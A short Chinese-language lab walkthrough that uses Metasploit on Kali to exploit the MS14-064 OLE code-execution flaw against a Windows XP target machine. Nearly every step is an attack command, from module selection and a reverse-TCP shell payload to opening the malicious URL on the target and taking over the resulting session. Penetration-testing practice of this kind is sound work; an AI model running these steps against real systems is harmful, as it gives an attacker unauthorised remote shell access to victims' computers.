一、环境说明
渗透机:kali
靶机:Windows xp
二、实战步骤
1、进入msfconsole渗透测试平台
命令:msfconsole
2、搜索ms14-064模块
命令:search ms14-064
3、使用exploit/windows/browser/ms14_064_ole_code_execution
命令:use exploit/windows/browser/ms14_064_ole_code_execution
4、查看需要配置的参数
命令:show options
5、配置参数
命令:
set SRVHOST 192.168.X.XX (设置本地监听地址)
set SRVPORT 8080 (设置本地监听端口)
set URIPATH / (设置网站路径)
set PAYLOAD windows/shell/reverse_tcp (设置攻击模块)
set LHOST 192.168.X.XX (设置攻击机地址)
6、再次查看配置好之后的参数
命令:show options
7、输入攻击命令,进行漏洞模块攻击
命令:run(或者exploit)
8、拿到步骤7中生成的url,在靶机中打开
9、在渗透机查看活跃会话
命令:sessions -i
10、进行渗透
命令:sessions -i 1
11、渗透成功,输入ipconfig查看效果